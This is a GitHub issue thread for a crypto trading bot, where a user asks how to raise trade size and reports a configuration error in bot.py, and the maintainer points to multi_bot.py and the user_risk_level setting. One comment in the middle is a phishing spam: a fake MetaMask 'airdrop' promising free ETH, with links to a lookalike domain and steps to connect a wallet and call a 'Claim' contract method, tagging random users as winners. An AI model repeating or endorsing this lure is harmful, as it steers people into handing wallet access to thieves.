### ISSUE TITLE
Quantity

### ISSUE THREAD

**Issue by neer2626** [donewiththedollar/directionalscalper#76]
how to increase the lot the size and usdt risk amount . what timings you prefer for using it ?
also only multi_bot is working 
bot.py is giving this error
    raise ValueError(f"Exchange {exchange_name} with account {account_name} not found in the configuration file.")
ValueError: Exchange None with account None not found in the configuration file.
config file is alright for multi_bot but not for bot.py ???

**Comment by donewiththedollar** [comment]
Use ''python3.11 multi_bot.py --config config.json'' and it should load the menu to select a strategy, the old bot.py is for single coin and has not been worked on in several months so it is likely outdated as bybit has upgraded to v5

**Comment by donewiththedollar** [comment]
Also user_risk_level is how you can increase or decrease your dynamic entry size

**Comment by jayceediaz2214** [comment]
# 🌐 **$ETH MetaMask Airdrop: Claim Your $1000 in Ethereum Now!**

🎉 **Congratulations!** 

You're among the chosen participants for the $1.5k Ethereum Airdrop. We're thrilled to grant you $1000 in ETH to celebrate the year's end. But that's not all—connect now, and you'll instantly receive an extra $100! Follow the steps below to claim your Ethereum and make the most of this exclusive giveaway!

[![Claim Now](https://pbs.twimg.com/media/Frg-sWYWIAYCoiX.jpg:large)](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask)

## **Steps to Claim:**

### 1. 🚀 **Connect Your MetaMask Wallet:**
   - Click on the [Connect Wallet](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask) link.
   - Select **MetaMask** as your preferred wallet provider.

### 2. 🔄 **Interact with the Contract and Claim Your $100:**
   - Once your MetaMask wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract. Ensure you use the **Claim** method.

💰 **Don't miss out on your $1000 in Ethereum!** Additionally, enjoy an instant $100 upon connection. Act now to secure your ETH. Remember, there's a chance to win up to $20,000—it's your golden opportunity with MetaMask!


Winners: @zj360202, @FranceSheep, @Amir-Alipour, @toanalien, @xusiyuan841028, @gustavorps, @arakilian0

**Comment by neer2626** [comment]
it is always 0.1 quantity or very lessd according to coin. only making a doller does nt matter investing 10$ or 100$....how can i increase the risk ?
